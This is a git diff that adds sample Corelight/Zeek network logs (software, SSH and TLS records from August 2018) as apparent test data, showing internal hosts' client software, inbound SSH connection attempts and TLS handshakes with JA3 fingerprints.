+{"ts":"2018-08-03T23:38:12.288716Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.255986Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:12.255129Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:12.280380Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.286460Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.286990Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.288354Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"HelpSupportServices","unparsed_version":"HelpSupportServices"} +{"ts":"2018-08-03T23:38:12.367493Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} +{"ts":"2018-08-03T23:38:12.537018Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:13.091905Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:13.329892Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"OutlookSocialConnector","version.major":1,"version.minor":0,"unparsed_version":"OutlookSocialConnector/1.0"} +{"ts":"2018-08-03T23:38:13.363231Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:38:13.636568Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:14.341408Z","host":"192.168.0.2","host_p":22,"software_type":"SSH::SERVER","name":"OpenSSH","version.major":6,"version.minor":4,"unparsed_version":"OpenSSH_6.4"} +{"ts":"2018-08-03T23:38:14.477099Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:16.038750Z","host":"192.168.0.2","host_p":22,"software_type":"SSH::SERVER","name":"OpenSSH","version.major":6,"version.minor":4,"unparsed_version":"OpenSSH_6.4"} +{"ts":"2018-08-03T23:38:16.869422Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:16.782286Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:17.152781Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:18.615164Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:19.456793Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:19.827130Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NVIDIA Notifius","version.major":1,"version.minor":14,"version.minor2":17,"unparsed_version":"NVIDIA Notifius v1.14.17"} +{"ts":"2018-08-03T23:38:20.025594Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:20.657883Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:21.009537Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:22.707684Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:23.509703Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:26.099651Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NVIDIA Notifius","version.major":1,"version.minor":14,"version.minor2":17,"unparsed_version":"NVIDIA Notifius v1.14.17"} +{"ts":"2018-08-03T23:38:41.992621Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"FDSSDP","unparsed_version":"FDSSDP"} +{"ts":"2018-08-03T23:38:44.055969Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Skype\u0099","version.major":7,"version.minor":2,"unparsed_version":"Skype\u0099 7.2"} +{"ts":"2018-08-03T23:38:45.138677Z","host":"192.168.0.53","host_p":2869,"software_type":"HTTP::SERVER","name":"Microsoft-HTTPAPI","version.major":1,"version.minor":0,"unparsed_version":"Microsoft-HTTPAPI/1.0"} +{"ts":"2018-08-03T23:38:48.910415Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Office Source Engine","unparsed_version":"Office Source Engine"} +{"ts":"2018-08-03T23:38:48.973457Z","host":"192.168.0.53","software_type":"SMTP::MAIL_CLIENT","name":"Microsoft Outlook Express","version.major":6,"version.minor":0,"version.minor2":2900,"version.minor3":5512,"unparsed_version":"Microsoft Outlook Express 6.00.2900.5512"} +{"ts":"2018-08-03T23:38:48.907917Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"Office Source Engine","unparsed_version":"Office Source Engine"} +{"ts":"2018-08-03T23:38:51.586164Z","host":"192.168.0.53","software_type":"HTTP::BROWSER","name":"Client","unparsed_version":"Client"} +{"ts":"2018-08-03T23:38:56.090902Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":3,"version.minor":4,"unparsed_version":"Python-urllib/3.4"} +{"ts":"2018-08-03T23:38:56.292434Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NVIDIA Notifius","version.major":1,"version.minor":14,"version.minor2":17,"unparsed_version":"NVIDIA Notifius v1.14.17"} +{"ts":"2018-08-03T23:38:59.144930Z","host":"192.168.0.2","host_p":22,"software_type":"SSH::SERVER","name":"OpenSSH","version.major":6,"version.minor":4,"unparsed_version":"OpenSSH_6.4"} +{"ts":"2018-08-03T23:38:58.894631Z","host":"192.168.0.54","software_type":"HTTP::BROWSER","name":"NVIDIA Notifius","version.major":1,"version.minor":14,"version.minor2":17,"unparsed_version":"NVIDIA Notifius v1.14.17"} +{"ts":"2018-08-03T23:38:59.148362Z","host":"192.168.0.2","host_p":22,"software_type":"SSH::SERVER","name":"OpenSSH","version.major":6,"version.minor":4,"unparsed_version":"OpenSSH_6.4"} diff --git a/Sample Data/Custom/Corelight/ssh_20180803_16:38:12-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/ssh_20180803_16:38:12-16:40:00-0700.log_ new file mode 100644 index 0000000000..7cf6b92a40 --- /dev/null +++ b/Sample Data/Custom/Corelight/ssh_20180803_16:38:12-16:40:00-0700.log_ @@ -0,0 +1,8 @@ +{"ts":"2018-08-03T23:38:07.145415Z","uid":"CZDNzM17Z7IIM6aiCg","id.orig_h":"212.71.235.158","id.orig_p":52998,"id.resp_h":"192.168.0.2","id.resp_p":22,"direction":"INBOUND","server":"SSH-2.0-OpenSSH_6.4"} +{"ts":"2018-08-03T23:38:14.341408Z","uid":"Cd2Bw41Y3L43thVVtd","id.orig_h":"85.25.43.94","id.orig_p":40522,"id.resp_h":"192.168.0.2","id.resp_p":22,"version":2,"direction":"INBOUND","client":"SSH-2.0-paramiko_1.15.1","server":"SSH-2.0-OpenSSH_6.4","cipher_alg":"aes128-ctr","mac_alg":"hmac-md5","compression_alg":"none","kex_alg":"diffie-hellman-group-exchange-sha1","host_key_alg":"ssh-rsa","host_key":"24:ca:ee:e1:84:b3:0f:1a:17:86:c0:72:0a:8c:61:f6"} +{"ts":"2018-08-03T23:38:16.038750Z","uid":"ChlhLC372Wy90aCsie","id.orig_h":"222.186.56.46","id.orig_p":4458,"id.resp_h":"192.168.0.2","id.resp_p":22,"version":2,"direction":"INBOUND","client":"SSH-2.0-libssh2_1.4.3","server":"SSH-2.0-OpenSSH_6.4"} +{"ts":"2018-08-03T23:38:44.981697Z","uid":"C80aN92il06fzkTt5c","id.orig_h":"61.160.247.150","id.orig_p":3029,"id.resp_h":"192.168.0.2","id.resp_p":22,"version":2,"direction":"INBOUND","client":"SSH-2.0-libssh2_1.4.3"} +{"ts":"2018-08-03T23:39:02.809566Z","uid":"CkoU0m2UO5IJCGczh","id.orig_h":"172.16.1.8","id.orig_p":41952,"id.resp_h":"172.16.1.7","id.resp_p":22,"version":2,"auth_success":true,"auth_attempts":2,"client":"SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10","server":"SSH-2.0-OpenSSH_7.4p1 Ubuntu-10","cipher_alg":"chacha20-poly1305@openssh.com","mac_alg":"umac-64-etm@openssh.com","compression_alg":"none","kex_alg":"curve25519-sha256@libssh.org","host_key_alg":"ssh-rsa","host_key":"2e:65:01:b6:47:1c:7f:9e:de:7e:eb:00:98:2b:a1:1d"} +{"ts":"2018-08-03T23:38:59.149811Z","uid":"CKjFMW2DiNiXKkipk5","id.orig_h":"61.160.247.104","id.orig_p":1048,"id.resp_h":"192.168.0.2","id.resp_p":22,"version":2,"direction":"INBOUND","client":"SSH-2.0-libssh2_1.4.3"} +{"ts":"2018-08-03T23:38:59.148362Z","uid":"C0HyjnU8giZuxqPC9","id.orig_h":"61.160.247.104","id.orig_p":3929,"id.resp_h":"192.168.0.2","id.resp_p":22,"direction":"INBOUND","client":"\u0000\u0000\u0003$\u00a7\u0014\u00ae\u000f\u00a3\u0001\u00db;SD\u001fe\u009b\u00e3Th\u0002e\u0000\u0000\u0000Ydiffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1\u0000\u0000\u0000\u000fssh-rsa,ssh-dss\u0000\u0000\u0000\u0092aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc\u0000\u0000\u0000\u0092aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc\u0000\u0000\u0000Uhmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com\u0000\u0000\u0000Uhmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com\u0000\u0000\u0000\u0004none\u0000\u0000\u0000\u0004none\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000o\u00bd\u00edt+\u00f2\u0091\u0008\u00dc\u00cc\u00c8\u00bdqA0\u00c4\u0098\u0017\u00c5\u00fa\u00ea\u00f3\u008c\u00e7\u00bc","server":"SSH-2.0-OpenSSH_6.4"} +{"ts":"2018-08-03T23:38:59.160619Z","uid":"CwQw6D3ll7W8PSB5z6","id.orig_h":"61.160.247.104","id.orig_p":4680,"id.resp_h":"192.168.0.2","id.resp_p":22,"version":2,"direction":"INBOUND","client":"SSH-2.0-libssh2_1.4.3","server":"SSH-2.0-OpenSSH_6.4"} diff --git a/Sample Data/Custom/Corelight/ssl_20180803_16:37:08-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/ssl_20180803_16:37:08-16:40:00-0800.log_ new file mode 100644 index 0000000000..965b0f0dc9 --- /dev/null +++ b/Sample Data/Custom/Corelight/ssl_20180803_16:37:08-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:39:00.229910Z","uid":"Cykbop1NKcXe2Mlgu2","id.orig_h":"192.168.0.54","id.orig_p":51713,"id.resp_h":"213.155.151.180","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"talkgadget.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.160920Z","uid":"Caqyt64mBP2Dzha7i1","id.orig_h":"192.168.0.54","id.orig_p":51581,"id.resp_h":"64.233.164.109","id.resp_p":993,"server_name":"imap.gmail.com","resumed":false,"established":false,"ja3":"1d095e68489d3c535297cd8dffb06cb9"} +{"ts":"2018-08-03T23:39:00.052122Z","uid":"C93aht3tiaCGJCqRQl","id.orig_h":"192.168.0.54","id.orig_p":51343,"id.resp_h":"216.58.209.109","id.resp_p":443,"server_name":"accounts.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.077428Z","uid":"CD6s0P9VwDz7NOBRa","id.orig_h":"192.168.0.54","id.orig_p":51384,"id.resp_h":"213.155.151.154","id.resp_p":443,"server_name":"talkgadget.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.112897Z","uid":"CZaXJr1zeqIEFRbhIc","id.orig_h":"192.168.0.54","id.orig_p":51459,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.163540Z","uid":"CA3SCAhjMobpd5aS4","id.orig_h":"192.168.0.53","id.orig_p":2360,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.163540Z","uid":"C3AE52uOKenW5LW15","id.orig_h":"192.168.0.54","id.orig_p":51569,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.269785Z","uid":"CftLzbvqCPCAL8KDl","id.orig_h":"192.168.0.54","id.orig_p":51773,"id.resp_h":"216.58.209.132","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","server_name":"www.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.269785Z","uid":"CSghtvDPdOKtabuek","id.orig_h":"192.168.0.53","id.orig_p":2552,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:38:59.993995Z","uid":"CD6g4p3dL7XfYkqThe","id.orig_h":"192.168.0.54","id.orig_p":51210,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.105210Z","uid":"Cxai1A26qI7iKQWBDd","id.orig_h":"192.168.0.54","id.orig_p":51455,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.145640Z","uid":"C9Y1I54Hki8oUSTtu4","id.orig_h":"192.168.0.54","id.orig_p":51539,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"safebrowsing-cache.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.191235Z","uid":"CVMtR224T4a2vlJjC6","id.orig_h":"192.168.0.54","id.orig_p":51621,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.267093Z","uid":"C26zGvrDidtclTCii","id.orig_h":"192.168.0.54","id.orig_p":51797,"id.resp_h":"213.155.151.187","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.302435Z","uid":"CrcPum3LJrsyMBuD1i","id.orig_h":"192.168.0.54","id.orig_p":51856,"id.resp_h":"216.58.209.132","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.005886Z","uid":"CN9GbB2oPF8mjVnuLc","id.orig_h":"192.168.0.54","id.orig_p":51218,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.100497Z","uid":"CMca4J2rrRDJdAnrk9","id.orig_h":"192.168.0.54","id.orig_p":51451,"id.resp_h":"216.58.209.141","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","server_name":"accounts.google.com","resumed":false,"established":false,"cert_chain_fuids":["FYb1YR2QlZNVzTCTel","FVvSSC1X2EhpJtOWA3","FPpiuF2bX5MsEZKV4i"],"client_cert_chain_fuids":[],"ja3":"e417b0731e0f2c81dc81ca57cb597b25"} +{"ts":"2018-08-03T23:39:00.100497Z","uid":"ClPMDFjZdda7I60i5","id.orig_h":"192.168.0.54","id.orig_p":51452,"id.resp_h":"213.155.151.153","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","server_name":"www.google.com","resumed":false,"established":false,"ja3":"e03fdb6b99211ce6d1ed8a21abf4b25b"} +{"ts":"2018-08-03T23:39:00.125837Z","uid":"CAijihzTfqqE2voAk","id.orig_h":"192.168.0.54","id.orig_p":51500,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.216875Z","uid":"CxJMPT1AdT3SztykAc","id.orig_h":"192.168.0.54","id.orig_p":51689,"id.resp_h":"104.75.76.169","id.resp_p":443,"server_name":"connect.facebook.net","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} +{"ts":"2018-08-03T23:39:00.257400Z","uid":"C84UK12Ic1BrMJJAo","id.orig_h":"192.168.0.54","id.orig_p":51754,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.318130Z","uid":"CE6Ss24zcHU87enIzc","id.orig_h":"192.168.0.54","id.orig_p":51894,"id.resp_h":"216.58.209.133","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.205358Z","uid":"C0XggYrOt8Z3NWyx","id.orig_h":"192.168.0.54","id.orig_p":51668,"id.resp_h":"213.155.151.180","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"talkgadget.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.230631Z","uid":"CHBwxv41JBPQAQeRAb","id.orig_h":"192.168.0.54","id.orig_p":51698,"id.resp_h":"213.155.151.187","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.245765Z","uid":"C1npoL1ETTMQieIZX2","id.orig_h":"192.168.0.53","id.orig_p":2528,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.113301Z","uid":"CkolD2cgqTbiPGcbb","id.orig_h":"192.168.0.54","id.orig_p":51479,"id.resp_h":"213.155.151.153","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.194268Z","uid":"CfiLqM2H43IG8eYRKf","id.orig_h":"192.168.0.53","id.orig_p":2391,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.285310Z","uid":"CT6fMi21FeSdFWf0hh","id.orig_h":"192.168.0.54","id.orig_p":51809,"id.resp_h":"213.155.151.187","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.295414Z","uid":"CXIoGp1wbwrS9e2Oza","id.orig_h":"192.168.0.53","id.orig_p":2583,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.167891Z","uid":"C0cwle45IwOqkHuvYa","id.orig_h":"192.168.0.51","id.orig_p":37897,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"safebrowsing.google.com","resumed":false,"established":false,"ja3":"01f79a7537bf2cb8b8e8f450d291c632"} +{"ts":"2018-08-03T23:39:00.344979Z","uid":"CyksYv3gyLHWL9FWK5","id.orig_h":"192.168.0.54","id.orig_p":51938,"id.resp_h":"216.58.209.141","id.resp_p":443,"server_name":"accounts.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.405699Z","uid":"Cbyt261YPgNkSZ2I1d","id.orig_h":"192.168.0.53","id.orig_p":2723,"id.resp_h":"31.13.64.1","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":true,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.431035Z","uid":"CNZHEfE7jITGV7seg","id.orig_h":"192.168.0.53","id.orig_p":2889,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.431035Z","uid":"C8cxoK1Ka39FGNgCE2","id.orig_h":"192.168.0.53","id.orig_p":2894,"id.resp_h":"31.13.64.1","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.456319Z","uid":"Cbwfa3mzdcZnlfzXe","id.orig_h":"192.168.0.54","id.orig_p":52183,"id.resp_h":"213.155.151.148","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":true,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.211055Z","uid":"CK2kR83eziD2s0SPIk","id.orig_h":"192.168.0.54","id.orig_p":51653,"id.resp_h":"213.155.151.187","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","server_name":"clients6.google.com","resumed":true,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.271732Z","uid":"CDkR0pUEuU3QVP5T5","id.orig_h":"192.168.0.53","id.orig_p":2560,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.018792Z","uid":"CCPKdd2ERFQhbqa83","id.orig_h":"192.168.0.54","id.orig_p":51247,"id.resp_h":"54.230.97.44","id.resp_p":443,"resumed":false,"established":false,"ja3":"8d0230b6ce881f161d1875364f4a156b"} +{"ts":"2018-08-03T23:39:00.408412Z","uid":"CDfpUr1XX5LnCtilZa","id.orig_h":"192.168.0.54","id.orig_p":52095,"id.resp_h":"173.194.40.242","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.208038Z","uid":"CHowgp1L3hd3O0weB2","id.orig_h":"192.168.0.54","id.orig_p":51654,"id.resp_h":"213.155.151.187","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.233266Z","uid":"C7a6BD4c6R4uq88iaa","id.orig_h":"192.168.0.54","id.orig_p":51716,"id.resp_h":"213.155.151.151","id.resp_p":443,"version":"TLSv10","cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA","server_name":"tools.google.com","resumed":false,"established":false,"ja3":"1d095e68489d3c535297cd8dffb06cb9"} +{"ts":"2018-08-03T23:39:00.233266Z","uid":"Crvcyu1CZXQ0lx6t77","id.orig_h":"192.168.0.54","id.orig_p":51720,"id.resp_h":"64.233.164.109","id.resp_p":993,"version":"TLSv10","cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","server_name":"imap.gmail.com","resumed":true,"established":false,"ja3":"1d095e68489d3c535297cd8dffb06cb9"} +{"ts":"2018-08-03T23:39:00.258587Z","uid":"C713Ir4qWgeL9p7Pi2","id.orig_h":"192.168.0.54","id.orig_p":51764,"id.resp_h":"216.58.209.101","id.resp_p":443,"server_name":"mail.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.370039Z","uid":"CSGqKg1BGlI6R7TZfg","id.orig_h":"192.168.0.54","id.orig_p":52018,"id.resp_h":"137.116.224.167","id.resp_p":443,"server_name":"a.config.skype.com","resumed":false,"established":false,"ja3":"2a458dd9c65afbcf591cd8c2a194b804"} +{"ts":"2018-08-03T23:39:00.370039Z","uid":"CuE4Xs1OLiU3JKBHze","id.orig_h":"192.168.0.54","id.orig_p":52019,"id.resp_h":"173.194.40.242","id.resp_p":443,"server_name":"www.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.385235Z","uid":"CutDQa1cZXvrIjYFK5","id.orig_h":"192.168.0.53","id.orig_p":2681,"id.resp_h":"31.13.64.1","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":true,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.420677Z","uid":"CfDhsX1uh8saOAbQRg","id.orig_h":"192.168.0.54","id.orig_p":52125,"id.resp_h":"213.155.151.148","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} +{"ts":"2018-08-03T23:39:00.171984Z","uid":"C3RiECghAiJwlChbi","id.orig_h":"192.168.0.54","id.orig_p":51594,"id.resp_h":"64.233.165.189","id.resp_p":443,"server_name":"10.client-channel.google.com","resumed":false,"established":false,"ja3":"daca8a9af4450c4d2e0ef0c691db8d7a"} +{"ts":"2018-08-03T23:39:00.308651Z","uid":"CV6ck47nbZiJBY2z6","id.orig_h":"192.168.0.53","id.orig_p":2591,"id.resp_h":"31.13.91.2","id.resp_p":443,"version":"TLSv10","cipher":"TLS_RSA_WITH_RC4_128_SHA","resumed":true,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:38:56.600539Z","uid":"CcjIdd4Cn1vToHgVwk","id.orig_h":"192.168.0.53","id.orig_p":2354,"id.resp_h":"31.13.91.2","id.resp_p":443,"resumed":false,"established":false,"ja3":"de350869b8c85de67a350c8d186f11e6"} +{"ts":"2018-08-03T23:39:00.161051Z","uid":"CGheKcuqX3soP2OY2","id.orig_h":"192.168.0.54","id.orig_p":51552,"id.resp_h":"213.155.151.180","id.resp_p":443,"server_name":"clients6.google.com","resumed":false,"established":false,"ja3":"5039c2e4865acfa462910ad50a1ecd66"} 